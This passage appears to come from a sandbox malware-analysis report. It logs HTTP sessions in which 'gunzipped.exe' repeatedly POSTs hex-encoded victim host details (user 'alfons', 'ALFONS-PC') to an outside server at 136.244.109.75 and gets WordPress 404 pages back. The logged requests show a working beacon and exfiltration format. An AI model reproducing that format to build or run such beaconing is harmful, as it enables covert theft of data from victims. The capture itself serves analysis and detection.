Apr 17, 2024 03:18:22.013490915 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:22.013531923 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49773	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:22.368817091 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:22.576855898 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:23.493002892 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:22 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:23.493066072 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:23.493103981 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:23.493139029 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:23.493177891 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:23.493216038 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:23.493257999 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:23.493299007 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:23.493335962 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:23.493380070 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49774	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:23.842884064 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:24.052902937 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:25.006131887 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:23 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:25.006189108 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:25.006228924 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:25.006270885 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:25.006320000 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:25.006360054 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:25.006403923 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:25.006448984 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:25.006489038 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:25.006530046 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49775	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:25.351054907 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:25.563291073 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
